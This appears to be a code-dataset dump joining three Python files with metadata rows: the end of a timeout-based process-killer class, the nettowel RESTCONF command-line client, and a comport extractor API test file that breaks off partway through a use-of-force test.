if self.hard_timeout != 0 and self.time_elapsed.value >= self.hard_timeout:
os.kill(self.pid_to_kill, self.hard_timeout_signal)
if self.critical_timeout != 0 and self.time_elapsed.value >= self.critical_timeout:
os.kill(self.pid_to_kill, self.critical_timeout_signal)
self.time_elapsed.value += self.sleep_interval
time.sleep(self.sleep_interval)
def start(
self,
):
if not self.created:
killing_loop_process = multiprocessing.Process(
target=self.killing_loop,
)
killing_loop_process.daemon = True
killing_loop_process.start()
self.created = True
self.stop_event.set()
def stop(
self,
):
self.stop_event.clear()
def reset(
self,
):
with self.time_elapsed.get_lock():
self.time_elapsed.value = 0.0
def __del__(
self,
):
self.stop()
| 27.191257 | 99 | 0.60832 | 588 | 4,976 | 4.807823 | 0.096939 | 0.110364 | 0.074284 | 0.064379 | 0.890343 | 0.853555 | 0.812522 | 0.798373 | 0.793067 | 0.767598 | 0 | 0.005865 | 0.314711 | 4,976 | 182 | 100 | 27.340659 | 0.823167 | 0 | 0 | 0.808511 | 0 | 0 | 0.000201 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.085106 | false | 0 | 0.035461 | 0 | 0.148936 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
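A hedged usage sketch for the LocalKiller class above: supervise a child process and escalate signals as time elapses. The child command and timeout values are illustrative assumptions; psutil must be installed for the class itself, and LocalKiller is assumed importable:

import signal
import subprocess

child = subprocess.Popen(['sleep', '60'])  # long-running child to supervise

killer = LocalKiller(
    pid=child.pid,
    soft_timeout=2.0, soft_timeout_signal=signal.SIGINT,
    hard_timeout=4.0, hard_timeout_signal=signal.SIGTERM,
    critical_timeout=6.0, critical_timeout_signal=signal.SIGKILL,
    memory_limit=0, memory_limit_signal=signal.SIGKILL,  # 0 disables the memory check
)
killer.start()  # spawns the daemon killing_loop thread and starts the clock
child.wait()    # SIGINT after ~2s, SIGTERM after ~4s, SIGKILL after ~6s
killer.stop()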
50ad06818bebe6fb9c8833f1d3fa47cba872b3c6 | 12,299 | py | Python | nettowel/cli/restconf.py | InfrastructureAsCode-ch/nettowel | 1b14ae7d253d1c9435a3c18a65078122fb4965dd | [
"Apache-2.0"
] | 1 | 2022-02-22T12:05:42.000Z | 2022-02-22T12:05:42.000Z | nettowel/cli/restconf.py | InfrastructureAsCode-ch/nettowel | 1b14ae7d253d1c9435a3c18a65078122fb4965dd | [
"Apache-2.0"
] | null | null | null | nettowel/cli/restconf.py | InfrastructureAsCode-ch/nettowel | 1b14ae7d253d1c9435a3c18a65078122fb4965dd | [
"Apache-2.0"
] | null | null | null | from typing import Union
import sys
import typer
from urllib.parse import quote
from rich import print_json, print
from rich.syntax import Syntax
from rich.prompt import Prompt
from rich.json import JSON
from rich.panel import Panel
from nettowel.cli._common import get_typer_app, auto_complete_paths
from nettowel.exceptions import (
NettowelRestconfError,
)
from nettowel.restconf import send_request
app = get_typer_app(help="RESTCONF functions")
def _send_request(
path: str,
method: str,
host: str,
user: str,
password: str,
port: int,
send_xml: bool,
return_xml: bool,
json: bool,
raw: bool,
verify: bool,
data_file: typer.FileText = None,
) -> None:
try:
if not user:
user = Prompt.ask("Enter username")
if not password:
password = Prompt.ask(f"Enter password for user {user}", password=True)
if data_file:
if data_file == "-":
data = sys.stdin.read()
else:
with open(data_file) as f: # type: ignore
data = f.read()
else:
data = None
result = send_request(
method=method,
url=f"https://{host}:{port}/restconf/data/{path}",
username=user,
password=password,
send_xml=send_xml,
return_xml=return_xml,
verify=verify,
data=data,
)
if raw:
print(result)
elif json:
print_json(data=result)
else:
if return_xml:
output: Union[Syntax, JSON] = Syntax(
result,
"xml",
line_numbers=True,
indent_guides=True,
)
else:
output = JSON.from_data(result)
print(
Panel(
output,
title=f"[yellow][bold]{method}[/bold] {path}",
border_style="blue",
)
)
raise typer.Exit(0)
except NettowelRestconfError as exc:
typer.echo(str(exc), err=True)
if exc.server_msg:
typer.echo(exc.server_msg, err=True)
raise typer.Exit(1)
@app.command()
def get(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="GET",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
)
@app.command()
def delete(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="DELETE",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
verify=verify,
raw=raw,
)
@app.command()
def post(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
data_file: typer.FileText = typer.Argument(
...,
exists=True,
file_okay=True,
dir_okay=False,
readable=True,
resolve_path=True,
allow_dash=True,
metavar="DATA",
help="Data to send. Use '-' to read from stdin",
autocompletion=auto_complete_paths,
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="POST",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
data_file=data_file,
)
@app.command()
def put(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
data_file: typer.FileText = typer.Argument(
...,
exists=True,
file_okay=True,
dir_okay=False,
readable=True,
resolve_path=True,
allow_dash=True,
metavar="DATA",
help="Data to send. Use '-' to read from stdin",
autocompletion=auto_complete_paths,
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="PUT",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
data_file=data_file,
)
@app.command()
def patch(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
data_file: typer.FileText = typer.Argument(
...,
exists=True,
file_okay=True,
dir_okay=False,
readable=True,
resolve_path=True,
allow_dash=True,
metavar="DATA",
help="Data to send. Use '-' to read from stdin",
autocompletion=auto_complete_paths,
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="PATCH",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
data_file=data_file,
)
@app.command()
def head(
ctx: typer.Context,
path: str = typer.Argument(
..., help="RESTCONF path. Example: Cisco-IOS-XE-native:native/hostname"
),
host: str = typer.Option(
..., help="Hostname or IP address", envvar="NETTOWEL_HOST"
),
user: str = typer.Option(None, help="Username for login", envvar="NETTOWEL_USER"),
password: str = typer.Option(
None, help="Login password", envvar="NETTOWEL_PASSWORD"
),
port: int = typer.Option(
default=443, help="Connection Port", envvar="NETTOWEL_RESTCONF_PORT"
),
send_xml: bool = typer.Option(
False,
"--send-xml",
help="Send XML instead of JSON",
),
return_xml: bool = typer.Option(
False,
"--return-xml",
help="Recieve XML instead of JSON",
),
verify: bool = typer.Option(
False,
"--no-verify",
help="Ignore SSL certificate verification",
envvar="NETTOWEL_VERIFY",
),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
_send_request(
path=path,
method="HEAD",
host=host,
user=user,
password=password,
port=port,
send_xml=send_xml,
return_xml=return_xml,
json=json,
raw=raw,
verify=verify,
)
@app.command()
def encode(
ctx: typer.Context,
text: str = typer.Argument(..., help="Text to encode / quote"),
json: bool = typer.Option(default=False, help="json output"),
raw: bool = typer.Option(default=False, help="raw output"),
) -> None:
result = quote(text, safe="")
if json:
print_json(data={"result": result})
elif raw:
print(result)
else:
print(Panel(result, title=f"[yellow]{text}", border_style="blue"))
if __name__ == "__main__":
app()
| 27.638202 | 86 | 0.56842 | 1,395 | 12,299 | 4.903226 | 0.099642 | 0.090058 | 0.070175 | 0.052632 | 0.79576 | 0.789035 | 0.789035 | 0.789035 | 0.784357 | 0.784357 | 0 | 0.002333 | 0.303033 | 12,299 | 444 | 87 | 27.70045 | 0.795614 | 0.000976 | 0 | 0.772512 | 0 | 0 | 0.200895 | 0.030199 | 0 | 0 | 0 | 0 | 0 | 1 | 0.018957 | false | 0.052133 | 0.028436 | 0 | 0.047393 | 0.016588 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
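A minimal sketch of calling the send_request helper that the commands above wrap, mirroring the arguments _send_request passes; the host and credentials are placeholders:

from nettowel.restconf import send_request

result = send_request(
    method='GET',
    url='https://router.example.com:443/restconf/data/Cisco-IOS-XE-native:native/hostname',
    username='admin',      # placeholder credentials
    password='secret',
    send_xml=False,
    return_xml=False,
    verify=False,
    data=None,
)
print(result)  # parsed JSON data when return_xml is False, an XML string otherwise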
50f2a970f7b7f50e219f8bc346916cbbfc103b4e | 46,875 | py | Python | tests/test_extractor_api.py | isabella232/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 35 | 2015-11-14T18:32:45.000Z | 2022-01-23T15:15:05.000Z | tests/test_extractor_api.py | codeforamerica/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 119 | 2015-11-20T22:45:34.000Z | 2022-02-10T23:02:36.000Z | tests/test_extractor_api.py | isabella232/comport | 117123862415261095a917ed7f2037c1f986b474 | [
"BSD-3-Clause"
] | 19 | 2015-11-20T20:41:52.000Z | 2022-01-26T04:12:34.000Z | # -*- coding: utf-8 -*-
"""Functional tests using WebTest.
See: http://webtest.readthedocs.org/
"""
import pytest
import responses
import json
from datetime import datetime
from comport.department.models import Department, Extractor
from comport.data.models import OfficerInvolvedShootingIMPD, UseOfForceIncidentIMPD, CitizenComplaintIMPD, AssaultOnOfficerIMPD
from testclient.JSON_test_client import JSONTestClient
from comport.data.cleaners import Cleaners
from flask import current_app
@pytest.mark.usefixtures('db')
class TestHeartbeat:
def test_reject_nonexistent_extractor_post(self, testapp):
''' An extractor login that doesn't exist is rejected.
'''
testapp.authorization = ('Basic', ('extractor', 'nonexistent'))
response = testapp.post("/data/heartbeat", expect_errors=True)
assert response.status_code == 401
assert response.text == 'No extractor with that username!'
def test_reject_extractor_post_with_wrong_password(self, testapp):
''' An extractor login with the wrong password is rejected.
'''
Extractor.create(username='extractor', email='extractor@example.com', password="password")
testapp.authorization = ('Basic', ('extractor', 'drowssap'))
response = testapp.post("/data/heartbeat", expect_errors=True)
assert response.status_code == 401
assert response.text == 'Extractor authorization failed!'
def test_successful_extractor_post(self, testapp):
''' Send a valid heartbeat post, get a valid response.
'''
# set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, _ = Extractor.from_department_and_password(department=department, password="password")
extractor.update(email='extractor@example.com', next_month=10, next_year=2006)
# set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# post a sample json object to the heartbeat URL
response = testapp.post_json("/data/heartbeat", params={"heartbeat": "heartbeat"})
# assert that we got the expected response
assert response.status_code == 200
assert response.json_body['nextMonth'] == 10
assert response.json_body['nextYear'] == 2006
assert response.json_body['received'] == {'heartbeat': 'heartbeat'}
def test_current_mmyy_on_no_setdate(self, testapp):
''' When there is no fixed date, it should send the current month and current year '''
# set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, _ = Extractor.from_department_and_password(department=department, password="password")
# set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# post a sample json object to the heartbeat URL
response = testapp.post_json("/data/heartbeat", params={"heartbeat": "heartbeat"})
# current month and year
now = datetime.now()
# assert that we got the expected response
assert response.status_code == 200
assert response.json_body['nextMonth'] == now.month
assert response.json_body['nextYear'] == now.year
assert response.json_body['received'] == {'heartbeat': 'heartbeat'}
@responses.activate
def test_extractor_post_triggers_slack_notification(self, testapp):
''' A valid heartbeat post triggers a Slack notification
'''
# set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, _ = Extractor.from_department_and_password(department=department, password="password")
# set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# set a fake Slack webhook URL
fake_webhook_url = 'http://webhook.example.com/'
current_app.config['SLACK_WEBHOOK_URL'] = fake_webhook_url
# create a mock to receive POST requests to that URL
responses.add(responses.POST, fake_webhook_url, status=200)
# post a sample json object to the heartbeat URL
testapp.post_json("/data/heartbeat", params={"heartbeat": "heartbeat"})
# test the captured post payload
post_body = json.loads(responses.calls[0].request.body)
assert 'Comport Pinged by Extractor!' in post_body['text']
# delete the fake Slack webhook URL
del(current_app.config['SLACK_WEBHOOK_URL'])
# reset the mock
responses.reset()
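    # An illustrative client-side sketch of the heartbeat exchange the tests
    # above exercise (placeholder host and credentials; assumes the `requests`
    # package; not part of the upstream suite):
    #
    #   import requests
    #   resp = requests.post('https://comport.example.com/data/heartbeat',
    #                        json={'heartbeat': 'heartbeat'},
    #                        auth=('extractor_username', 'password'))
    #   resp.json()  # -> {'nextMonth': ..., 'nextYear': ...,
    #                #     'received': {'heartbeat': 'heartbeat'}}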
def test_post_assaults_data(self, testapp):
''' New assaults data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of assault descriptions from the JSON test client
test_client = JSONTestClient()
assault_count = 1
assault_data = test_client.get_prebaked_assaults(last=assault_count)
# post the json to the assault URL
response = testapp.post_json("/data/assaults", params={'month': 0, 'year': 0, 'data': assault_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == assault_count
# check the assault incident in the database against the data that was sent
cleaner = Cleaners()
sent_assault = cleaner.capitalize_incident(assault_data[0])
check_assault = AssaultOnOfficerIMPD.query.filter_by(opaque_id=sent_assault['opaqueId']).first()
assert check_assault.service_type == sent_assault['serviceType']
assert check_assault.force_type == sent_assault['forceType']
assert check_assault.assignment == sent_assault['assignment']
assert check_assault.arrest_made == sent_assault['arrestMade']
assert check_assault.officer_injured == sent_assault['officerInjured']
assert check_assault.officer_killed == sent_assault['officerKilled']
assert check_assault.report_filed == sent_assault['reportFiled']
def test_post_complaint_data(self, testapp):
''' New complaint data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_count = 1
complaint_data = test_client.get_prebaked_complaints(last=complaint_count)
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == complaint_count
# check the complaint incident in the database against the data that was sent
cleaner = Cleaners()
sent_complaint = cleaner.capitalize_incident(complaint_data[0])
check_complaint = CitizenComplaintIMPD.query.filter_by(opaque_id=sent_complaint['opaqueId']).first()
assert check_complaint.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_complaint['occuredDate']
assert check_complaint.division == sent_complaint['division']
assert check_complaint.precinct == sent_complaint['precinct']
assert check_complaint.shift == sent_complaint['shift']
assert check_complaint.beat == sent_complaint['beat']
assert check_complaint.disposition == sent_complaint['disposition']
assert check_complaint.service_type == sent_complaint['serviceType']
assert check_complaint.source == sent_complaint['source']
assert check_complaint.allegation_type == sent_complaint['allegationType']
assert check_complaint.allegation == sent_complaint['allegation']
assert check_complaint.resident_race == cleaner.race(sent_complaint['residentRace'])
assert check_complaint.resident_sex == cleaner.sex(sent_complaint['residentSex'])
assert check_complaint.resident_age == cleaner.number_to_string(sent_complaint['residentAge'])
assert check_complaint.officer_identifier == sent_complaint['officerIdentifier']
assert check_complaint.officer_race == cleaner.race(sent_complaint['officerRace'])
assert check_complaint.officer_sex == cleaner.sex(sent_complaint['officerSex'])
assert check_complaint.officer_age == cleaner.number_to_string(sent_complaint['officerAge'])
assert check_complaint.officer_years_of_service == cleaner.number_to_string(sent_complaint['officerYearsOfService'])
def test_correct_complaint_cap(self, testapp):
        ''' Complaint allegation text from the extractor is capitalized as expected.
        '''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_count = 1
complaint_data = test_client.get_prebaked_complaints(last=complaint_count)
complaint_data[0]["allegation"] = "Rude, demeaning, or affronting language"
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == complaint_count
# check the complaint incident in the database against the data that was sent
cleaner = Cleaners()
sent_complaint = cleaner.capitalize_incident(complaint_data[0])
check_complaint = CitizenComplaintIMPD.query.filter_by(opaque_id=sent_complaint['opaqueId']).first()
assert check_complaint.allegation == "Rude, Demeaning, or Affronting Language"
def test_post_mistyped_complaint_data(self, testapp):
''' New complaint data from the extractor with wrongly typed data is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_count = 1
complaint_data = test_client.get_prebaked_complaints(last=complaint_count)
# The app expects number values to be transmitted as strings. Let's change them to integers.
complaint_data[0]['residentAge'] = 28
complaint_data[0]['officerAge'] = 46
complaint_data[0]['officerYearsOfService'] = 17
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == complaint_count
# check the complaint incident in the database against the data that was sent
cleaner = Cleaners()
sent_complaint = cleaner.capitalize_incident(complaint_data[0])
check_complaint = CitizenComplaintIMPD.query.filter_by(opaque_id=sent_complaint['opaqueId']).first()
assert check_complaint.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_complaint['occuredDate']
assert check_complaint.division == sent_complaint['division']
assert check_complaint.precinct == sent_complaint['precinct']
assert check_complaint.shift == sent_complaint['shift']
assert check_complaint.beat == sent_complaint['beat']
assert check_complaint.disposition == sent_complaint['disposition']
assert check_complaint.service_type == sent_complaint['serviceType']
assert check_complaint.source == sent_complaint['source']
assert check_complaint.allegation_type == sent_complaint['allegationType']
assert check_complaint.allegation == sent_complaint['allegation']
assert check_complaint.resident_race == cleaner.race(sent_complaint['residentRace'])
assert check_complaint.resident_sex == cleaner.sex(sent_complaint['residentSex'])
assert check_complaint.resident_age == cleaner.number_to_string(sent_complaint['residentAge'])
assert check_complaint.officer_identifier == sent_complaint['officerIdentifier']
assert check_complaint.officer_race == cleaner.race(sent_complaint['officerRace'])
assert check_complaint.officer_sex == cleaner.sex(sent_complaint['officerSex'])
assert check_complaint.officer_age == cleaner.number_to_string(sent_complaint['officerAge'])
assert check_complaint.officer_years_of_service == cleaner.number_to_string(sent_complaint['officerYearsOfService'])
def test_update_complaint_data(self, testapp):
''' Updated complaint data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_data = test_client.get_prebaked_complaints(last=1)
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked complaint
updated_complaint_data = test_client.get_prebaked_complaints(first=1, last=2)
# Swap in the opaque ID from the first complaint
updated_complaint_data[0]["opaqueId"] = complaint_data[0]["opaqueId"]
# The complaint won't be a match unless these fields are the same
updated_complaint_data[0]["allegationType"] = complaint_data[0]["allegationType"]
updated_complaint_data[0]["allegation"] = complaint_data[0]["allegation"]
updated_complaint_data[0]["officerIdentifier"] = complaint_data[0]["officerIdentifier"]
updated_complaint_data[0]["residentRace"] = complaint_data[0]["residentRace"]
updated_complaint_data[0]["residentSex"] = complaint_data[0]["residentSex"]
updated_complaint_data[0]["residentAge"] = complaint_data[0]["residentAge"]
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': updated_complaint_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 1
assert response.json_body['added'] == 0
# There's only one complaint in the database.
all_complaints = CitizenComplaintIMPD.query.all()
assert len(all_complaints) == 1
# check the complaint incident in the database against the updated data that was sent
cleaner = Cleaners()
sent_complaint = cleaner.capitalize_incident(updated_complaint_data[0])
check_complaint = CitizenComplaintIMPD.query.filter_by(opaque_id=sent_complaint['opaqueId']).first()
assert check_complaint.occured_date.strftime('%Y-%m-%d %-H:%-M:%S') == sent_complaint['occuredDate']
assert check_complaint.division == sent_complaint['division']
assert check_complaint.precinct == sent_complaint['precinct']
assert check_complaint.shift == sent_complaint['shift']
assert check_complaint.beat == sent_complaint['beat']
assert check_complaint.disposition == sent_complaint['disposition']
assert check_complaint.service_type == sent_complaint['serviceType']
assert check_complaint.source == sent_complaint['source']
assert check_complaint.allegation_type == sent_complaint['allegationType']
assert check_complaint.allegation == sent_complaint['allegation']
assert check_complaint.resident_race == cleaner.race(sent_complaint['residentRace'])
assert check_complaint.resident_sex == cleaner.sex(sent_complaint['residentSex'])
assert check_complaint.resident_age == cleaner.number_to_string(sent_complaint['residentAge'])
assert check_complaint.officer_identifier == sent_complaint['officerIdentifier']
assert check_complaint.officer_race == cleaner.race(sent_complaint['officerRace'])
assert check_complaint.officer_sex == cleaner.sex(sent_complaint['officerSex'])
assert check_complaint.officer_age == cleaner.number_to_string(sent_complaint['officerAge'])
assert check_complaint.officer_years_of_service == cleaner.number_to_string(sent_complaint['officerYearsOfService'])
def test_skip_multiple_complaint_data(self, testapp):
''' Multiple complaint data from the extractor is skipped.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_data = test_client.get_prebaked_complaints(last=1)
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked complaint
multiple_complaint_data = test_client.get_prebaked_complaints(first=1, last=2)
# Swap in the opaque ID from the first complaint
multiple_complaint_data[0]["opaqueId"] = complaint_data[0]["opaqueId"]
# The complaint will be skipped as a 'multiple' if these fields are the same
multiple_complaint_data[0]["allegationType"] = complaint_data[0]["allegationType"]
multiple_complaint_data[0]["allegation"] = complaint_data[0]["allegation"]
multiple_complaint_data[0]["officerIdentifier"] = complaint_data[0]["officerIdentifier"]
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': multiple_complaint_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 0
# There is one complaint in the database.
all_complaints = CitizenComplaintIMPD.query.all()
assert len(all_complaints) == 1
def test_post_complaint_data_near_match_does_not_update(self, testapp):
''' Complaint data with the same ID but different details creates a new record.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of complaint descriptions from the JSON test client
test_client = JSONTestClient()
complaint_data = test_client.get_prebaked_complaints(last=1)
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': complaint_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# Get the second pre-baked complaint
updated_complaint_data = test_client.get_prebaked_complaints(first=1, last=2)
# Swap in the opaque ID from the first complaint
updated_complaint_data[0]["opaqueId"] = complaint_data[0]["opaqueId"]
# post the json to the complaint URL
response = testapp.post_json("/data/complaints", params={'month': 0, 'year': 0, 'data': updated_complaint_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == 1
# There are two complaints in the database.
all_complaints = CitizenComplaintIMPD.query.all()
assert len(all_complaints) == 2
def test_post_uof_data(self, testapp):
''' New UOF data from the extractor is processed as expected.
'''
# Set up the extractor
department = Department.create(name="IM Police Department", short_name="IMPD", load_defaults=False)
extractor, envs = Extractor.from_department_and_password(department=department, password="password")
# Set the correct authorization
testapp.authorization = ('Basic', (extractor.username, 'password'))
# Get a generated list of UOF descriptions from the JSON test client
test_client = JSONTestClient()
uof_count = 1
uof_data = test_client.get_prebaked_uof(last=uof_count)
# post the json to the UOF URL
response = testapp.post_json("/data/UOF", params={'month': 0, 'year': 0, 'data': uof_data})
        # assert that we got the expected response
assert response.status_code == 200
assert response.json_body['updated'] == 0
assert response.json_body['added'] == uof_count
# check the uof incident in the database against the data that was sent
